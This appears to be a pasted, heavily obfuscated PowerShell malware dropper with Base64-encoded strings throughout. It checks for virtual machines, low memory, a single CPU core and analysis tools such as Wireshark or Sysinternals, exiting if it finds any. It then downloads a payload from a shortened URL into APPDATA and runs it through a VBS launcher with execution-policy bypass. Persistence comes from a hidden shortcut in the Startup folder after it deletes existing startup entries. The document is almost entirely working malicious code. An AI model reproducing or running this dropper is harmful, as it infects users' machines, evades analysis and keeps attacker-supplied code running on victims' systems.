Loading

lowerdoc

  1. $file_url = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aAB0AHQAcABzADoALwAvAGIAaQB0AC4AbAB5AC8AMgBsAEcAcABpAGMAdABJAEcA')))
  2. ${_/\/===\___/\_/\_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('XwAuAGoAcABnAA==')))
  3. function __/==\__/\/=\_/=\/()
  4. {
  5.     ${_/\/==\/\/\__/==\} = 2900000000
  6.     ${/==\__/=====\/\_/} = New-Object System.Collections.ArrayList
  7.     ${/==\__/=====\/\_/}.Add($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cwBlAGwAZQBjAHQAIAAqACAAZgByAG8AbQAgAHcAaQBuADMAMgBfAEIASQBPAFMAIAB3AGgAZQByAGUAIABTAE0AQgBJAE8AUwBCAEkATwBTAFYARQBSAFMASQBPAE4AIABMAEkASwBFACAAJwAlAFYAQgBPAFgAJQAnAA==')))) | Out-Null
  8.     ${/==\__/=====\/\_/}.Add($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cwBlAGwAZQBjAHQAIAAqACAAZgByAG8AbQAgAHcAaQBuADMAMgBfAEIASQBPAFMAIAB3AGgAZQByAGUAIABTAE0AQgBJAE8AUwBCAEkATwBTAFYARQBSAFMASQBPAE4AIABMAEkASwBFACAAJwAlAGIAbwBjAGgAcwAlACcA')))) | Out-Null
  9.     ${/==\__/=====\/\_/}.Add($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cwBlAGwAZQBjAHQAIAAqACAAZgByAG8AbQAgAHcAaQBuADMAMgBfAEIASQBPAFMAIAB3AGgAZQByAGUAIABTAE0AQgBJAE8AUwBCAEkATwBTAFYARQBSAFMASQBPAE4AIABMAEkASwBFACAAJwAlAHEAZQBtAHUAJQAnAA==')))) | Out-Null
  10.     ${/==\__/=====\/\_/}.Add($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cwBlAGwAZQBjAHQAIAAqACAAZgByAG8AbQAgAHcAaQBuADMAMgBfAEIASQBPAFMAIAB3AGgAZQByAGUAIABTAE0AQgBJAE8AUwBCAEkATwBTAFYARQBSAFMASQBPAE4AIABMAEkASwBFACAAJwAlAFYAaQByAHQAdQBhAGwAQgBvAHgAJQAnAA==')))) | Out-Null
  11.     ${/==\__/=====\/\_/}.Add($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cwBlAGwAZQBjAHQAIAAqACAAZgByAG8AbQAgAHcAaQBuADMAMgBfAEIASQBPAFMAIAB3AGgAZQByAGUAIABTAE0AQgBJAE8AUwBCAEkATwBTAFYARQBSAFMASQBPAE4AIABMAEkASwBFACAAJwAlAFYATQAlACcA')))) | Out-Null
  12.     foreach (${__/=\/=\/\_/=\_/\} in ${/==\__/=====\/\_/})
  13.     {
  14.         $result = ''; clv result;
  15.         $result = gwmi -Query ${__/=\/=\/\_/=\_/\}
  16.         if ($result)
  17.         {
  18.             Write-Host $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBpAHIAdAB1AGEAbAAgAE0AYQBjAGgAaQBuAGUAIABEAGUAdABlAGMAdABlAGQALgA='))) -ForegroundColor Red
  19.             exit;
  20.         }
  21.     }
  22.     ${__/=\/=\/\_/=\_/\} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBlAGwAZQBjAHQAIAAqACAAZgByAG8AbQAgAHcAaQBuADMAMgBfAEIASQBPAFMAIAB3AGgAZQByAGUAIABNAGEAbgB1AGYAYQBjAHQAdQByAGUAcgAgAEwASQBLAEUAIAAnACUAWABFAE4AJQAnAA==')))
  23.     $result = gwmi -Query ${__/=\/=\/\_/=\_/\}
  24.     if ($result) { Write-Host $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBpAHIAdAB1AGEAbAAgAE0AYQBjAGgAaQBuAGUAIABEAGUAdABlAGMAdABlAGQALgA='))) -ForegroundColor Red; exit; }
  25.     $result = gwmi -Query $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBlAGwAZQBjAHQAIABUAG8AdABhAGwAUABoAHkAcwBpAGMAYQBsAE0AZQBtAG8AcgB5ACAAZgByAG8AbQAgAFcAaQBuADMAMgBfAEMAbwBtAHAAdQB0AGUAcgBTAHkAcwB0AGUAbQA='))) | Out-String
  26.     $result = [regex]::Match($result, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VABvAHQAYQBsAFAAaAB5AHMAaQBjAGEAbABNAGUAbQBvAHIAeQAgADoAIAAoAFwAZAArACkA'))))
  27.     ${____/\/===\/\/\/=} = $result.Groups[1].Value
  28.     if ([int64]${____/\/===\/\/\/=} -lt [int64]${_/\/==\/\/\__/==\})
  29.     {
  30.         exit
  31.     }
  32.     ${_/\__/====\__/=\_} = gwmi -Class win32_Processor | select NumberOfCores | Out-String
  33.     ${_/\__/====\__/=\_} = [regex]::Match(${_/\__/====\__/=\_}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LgAqACgAXABkACsAKQA='))))
  34.     ${_/\__/====\__/=\_} = ${_/\__/====\__/=\_}.Groups[1].Value
  35.     if (${_/\__/====\__/=\_} -le 1)
  36.     {
  37.         exit
  38.     }
  39.     ${_/\/=\_/\/====\_/} = ps | select Company
  40.     $result = ""
  41.     if (${_/\/=\_/\/====\_/} -match $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VwBpAHIAZQBzAGgAYQByAGsA'))))
  42.     {
  43.         exit
  44.     }
  45.     if (${_/\/=\_/\/====\_/} -match $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB5AHMAaQBuAHQAZQByAG4AYQBsAHMA'))))
  46.     {
  47.         exit
  48.     }
  49. }
  50. __/==\__/\/=\_/=\/
  51. function _/=\/=\___/===\/==
  52. {
  53.   try
  54.   {
  55.     ${__/\__/=\/\/\_/=\} = Get-Random -Minimum 3 -Maximum 9
  56.     ${/=\__/\_/\_/===\_} = ""
  57.     For (${____/\_/==\/=\/\/}=0; ${____/\_/==\/=\/\/} -le ${__/\__/=\/\/\_/=\}; ${____/\_/==\/=\/\/}++)
  58.     {
  59.       ${/\____/==\__/=\/=}  = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cQB3AGUAcgB0AHkAdQBpAG8AcABsAGsAagBoAGcAZgBkAHMAYQB6AHgAYwB2AGIAbgBtAFEAVwBFAFIAVABZAFUASQBPAFAAQQBTAEQARgBHAEgASgBLAEwAWgBYAEMAVgBCAE4ATQAwADEAMgAzADQANQA2ADcAOAA5AA==')))
  60.       ${____/=\/\/\/\/=\/}  = Get-Random -Minimum 1 -Maximum ${/\____/==\__/=\/=}.Length
  61.       ${/==\__/\______/==} = ${/\____/==\__/=\/=}.Substring(${____/=\/\/\/\/=\/}, 1)
  62.       ${/=\__/\_/\_/===\_} = ${/=\__/\_/\_/===\_} + ${/==\__/\______/==}
  63.     }
  64.     return ${/=\__/\_/\_/===\_}
  65.   }
  66.   finally{}
  67. }
  68. function ___/=\/\_/========(${__/\/===\__/=\/=\_}, ${__/\__/\/\/\__/=\/})
  69. {
  70.     ${_________/=\/=\/=} = New-Object $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB5AHMAdABlAG0ALgBVAHIAaQA='))) $ExecutionContext.InvokeCommand.ExpandString(${__/\/===\__/=\/=\_})
  71.     ${_/\/\/==\/=====\/} = [System.Net.HttpWebRequest]::Create(${_________/=\/=\/=})
  72.     ${_/\/\/==\/=====\/}.set_Timeout(15000)
  73.     ${__/\_/\/=\/=\/\/\} = ${_/\/\/==\/=====\/}.GetResponse()
  74.     ${__/==\_/=\/=\/=\/} = [System.Math]::Floor(${__/\_/\/=\/=\/\/\}.get_ContentLength()/1024)
  75.     ${__/====\_/\/=\/=\} = ${__/\_/\/=\/=\/\/\}.GetResponseStream()
  76.     ${/=\_/====\/=\/=\/} = New-Object -TypeName System.IO.FileStream -ArgumentList ${__/\__/\/\/\__/=\/}, Create
  77.     ${/==\/=\_/==\____/} = new-object byte[] 10KB
  78.     ${/=\/=====\_/\_/==} = ${__/====\_/\/=\/=\}.Read(${/==\/=\_/==\____/},0,${/==\/=\_/==\____/}.length)
  79.     ${/==\/\__/\_/\/\__} = ${/=\/=====\_/\_/==}
  80.     while (${/=\/=====\_/\_/==} -gt 0)
  81.     {
  82.         ${/=\_/====\/=\/=\/}.Write(${/==\/=\_/==\____/}, 0, ${/=\/=====\_/\_/==})
  83.         ${/=\/=====\_/\_/==} = ${__/====\_/\/=\/=\}.Read(${/==\/=\_/==\____/},0,${/==\/=\_/==\____/}.length)
  84.         ${/==\/\__/\_/\/\__} = ${/==\/\__/\_/\/\__} + ${/=\/=====\_/\_/==}
  85.     }
  86.     ${/=\_/====\/=\/=\/}.Flush()
  87.     ${/=\_/====\/=\/=\/}.Close()
  88.     ${/=\_/====\/=\/=\/}.Dispose()
  89.     ${__/====\_/\/=\/=\}.Dispose()
  90.     return "Y"
  91. }
  92. function _____/\/\/==\_/\/\
  93. {
  94.   Param([string]${__/=\/=\_/=\/\/\__},[string]${_/==\/\_/===\_/\__});
  95.   try{
  96.     ${_/\/\/=\/\_/\/==\} = New-Object -ComObject WScript.Shell
  97.     ${/===\/==\______/=} = ${_/\/\/=\/\_/\/==\}.CreateShortcut(${__/=\/=\_/=\/\/\__})
  98.     ${/===\/==\______/=}.TargetPath = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JQBDAG8AbQBTAHAAZQBjACUA')))
  99.     ${/===\/==\______/=}.Arguments = $ExecutionContext.InvokeCommand.ExpandString($ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JAB7AF8ALwA9AD0AXAAvAFwAXwAvAD0APQA9AFwAXwAvAFwAXwBfAH0A'))))
  100.     ${/===\/==\______/=}.WindowStyle = 7
  101.     ${/===\/==\______/=}.IconLocation = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXABTAHkAcwB0AGUAbQAzADIAXABTAEgARQBMAEwAMwAyAC4AZABsAGwALAA0AA==')))
  102.     ${/===\/==\______/=}.Save()
  103.   }finally{}
  104. }
  105. function ___/\/=\/=\__/====
  106. {
  107.   try
  108.   {
  109.     ${/=\___/==\/\/=\/\} = New-Object System.Threading.Mutex($false, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('OQA5ADkAOQA5ADkAOQA5ADkA'))))
  110.     return ${/=\___/==\/\/=\/\}.WaitOne()
  111.   }finally{}
  112. }
  113.   if (___/\/=\/=\__/====)  {
  114.     ${__/=\/=========\_} = ${env:APPDATA}+"\"
  115.     ${_/==\_/=\/====\__} = _/=\/=\___/===\/==
  116.     ${/=\/=\___/\__/\/\}  = ${__/=\/=========\_} + ${_/==\_/=\/====\__} + $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LgB0AHgAdAA=')))
  117.     sleep -s 1
  118.     ${____/\_/==\/=\/\/}  = $false
  119.     while(${____/\_/==\/=\/\/} -ne $true) {
  120.       ___/=\/\_/======== ${__/\/===\__/=\/=\_} ${/=\/=\___/\__/\/\}; sleep -s 1
  121.       if ((gi ${/=\/=\___/\__/\/\}).length -gt 8kb){
  122.         ${____/\_/==\/=\/\/}  = $true
  123.         ${___/=\__/==\/====} =  "Y"
  124.       }else{
  125.         ${___/=\__/==\/====} = "N"
  126.       }
  127.       Write-Host ${____/\_/==\/=\/\/}
  128.     }
  129.     sc -Path $env:APPDATA\${_/\/===\___/\_/\_} -Value $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cwBlAHQAIAB5AG8AbQBhAG0AYQA9AEMAcgBlAGEAdABlAE8AYgBqAGUAYwB0ACgAIgBXAHMAYwByAGkAcAB0AC4AUwBoAGUAbABsACIAKQAgAAoAeQBvAG0AYQBtAGEALgBSAHUAbgAgACIAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQB4AGUAYwAgAGIAeQBwAGEAcwBzACAALQBmAGkAbABlACAAcwBvAGYAYQB0ACIALAAgADAALAAgAEYAYQBsAHMAZQA=')))
  130.     ${___/=\__/==\/====} =  "Y"
  131.     if (${___/=\__/==\/====} -eq "Y") {
  132.       ${/=\__/=\/=\/\_/\_} = ${_/==\_/=\/====\__} + $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LgBwAHMAMQA=')))
  133.       ren -Path $ExecutionContext.InvokeCommand.ExpandString($ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JAB7AC8APQBcAC8APQBcAF8AXwBfAC8AXABfAF8ALwBcAC8AXAB9AA==')))) -NewName $ExecutionContext.InvokeCommand.ExpandString($ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JAB7AC8APQBcAF8AXwAvAD0AXAAvAD0AXAAvAFwAXwAvAFwAXwB9AA=='))));
  134.       }
  135.       sleep -s 3
  136.       ${/===\/\/=\__/==\_} = _/=\/=\___/===\/==
  137.       ${__/\/\/===\_/==\/} = ${/===\/\/=\__/==\_} + $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LgB2AGIAcwA=')))
  138.       ren -Path $ExecutionContext.InvokeCommand.ExpandString($ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAHsAXwAvAFwALwA9AD0APQBcAF8AXwBfAC8AXABfAC8AXABfAH0A')))) -NewName $ExecutionContext.InvokeCommand.ExpandString($ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAHsAXwBfAC8AXAAvAFwALwA9AD0APQBcAF8ALwA9AD0AXAAvAH0A'))));
  139.       (gc $env:APPDATA\${__/\/\/===\_/==\/}).replace($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cwBvAGYAYQB0AA=='))), $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JAB7AC8APQBcAF8AXwAvAD0AXAAvAD0AXAAvAFwAXwAvAFwAXwB9AA==')))) | sc $env:APPDATA\${__/\/\/===\_/==\/} ;
  140.       sleep -s 3
  141.       cd $env:APPDATA ;
  142.       ${_/=\/\/\/====\/=\} = New-Object -Com WScript.Shell
  143.       ${__/\/===\/\/=\/=\} = ${_/=\/\/\/====\/=\}.SpecialFolders.Item($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cwB0AGEAcgB0AHUAcAA='))));
  144.       del ${__/\/===\/\/=\/=\}\*.vbs
  145.       del ${__/\/===\/\/=\/=\}\*.lnk
  146.       ${_/==\/\_/===\_/\__} = $ExecutionContext.InvokeCommand.ExpandString($ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LwBjACAAYwBkACAAJQBBAFAAUABEAEEAVABBACUAIAAmACYAIAAlAEEAUABQAEQAQQBUAEEAJQBcACQAewBfAF8ALwBcAC8AXAAvAD0APQA9AFwAXwAvAD0APQBcAC8AfQA='))))
  147.       ${/===\___/=======\} = $ExecutionContext.InvokeCommand.ExpandString($ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JAB7AF8AXwAvAFwALwA9AD0APQBcAC8AXAAvAD0AXAAvAD0AXAB9AFwAUwB0AGEAcgB0AC0AdQBwAC4AbABuAGsA'))))
  148.       _____/\/\/==\_/\/\ ${/===\___/=======\}  ${_/==\/\_/===\_/\__}
  149.       sleep -s 10
  150.       ${_/=\/\/\/====\/=\}.Run($ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('IgAkAHsAXwBfAC8AXAAvAD0APQA9AFwALwBcAC8APQBcAC8APQBcAH0AXABTAHQAYQByAHQALQB1AHAALgBsAG4AawAiAA=='))))
  151.     }